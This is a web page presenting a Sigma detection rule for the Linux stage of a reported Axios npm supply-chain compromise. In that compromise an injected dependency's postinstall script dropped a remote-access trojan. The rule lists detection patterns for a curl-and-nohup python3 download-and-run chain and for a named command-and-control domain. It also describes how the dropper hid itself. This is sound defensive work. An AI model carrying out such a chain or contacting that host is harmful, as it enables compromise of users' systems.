Axios NPM Compromise Indicators - Linux

calendar Apr 1, 2026 · attack.initial-access attack.t1195.002 attack.execution attack.command-and-control attack.defense-evasion attack.t1059.006 attack.t1059.004 attack.t1105 detection.emerging-threats  ·
Share on: linkedin copy

Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency by Axios NPM package, including payload download via curl and detached execution using nohup and python3. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.

Sigma rule (View on GitHub)

 1title: Axios NPM Compromise Indicators - Linux
 2id: 0a23a62d-c5b3-468b-a072-25064a9a8c87
 3status: experimental
 4description: |
 5    Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency by Axios NPM package, including payload download via curl and detached execution using nohup and python3.
 6    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
 7    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.    
 8references:
 9    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
10    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
11    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
12    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
13    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
14author: Swachchhanda Shrawan Poudel (Nextron Systems)
15date: 2026-04-01
16tags:
17    - attack.initial-access
18    - attack.t1195.002
19    - attack.execution
20    - attack.command-and-control
21    - attack.defense-evasion
22    - attack.t1059.006
23    - attack.t1059.004
24    - attack.t1105
25    - detection.emerging-threats
26logsource:
27    category: process_creation
28    product: linux
29detection:
30    selection_node_shell:
31        ParentImage|endswith:
32            - '/node'
33            - '/bun'
34        CommandLine|contains|all:
35            - 'curl '
36            - '/tmp/ld.py'
37            - 'python3 '
38            - 'nohup '
39            - '6202033'
40    selection_curl_download:
41        Image|endswith: '/curl'
42        CommandLine|contains: 'http://sfrclak.com'
43    condition: 1 of selection_*
44falsepositives:
45    - Unlikely
46level: high

References

Related rules

to-top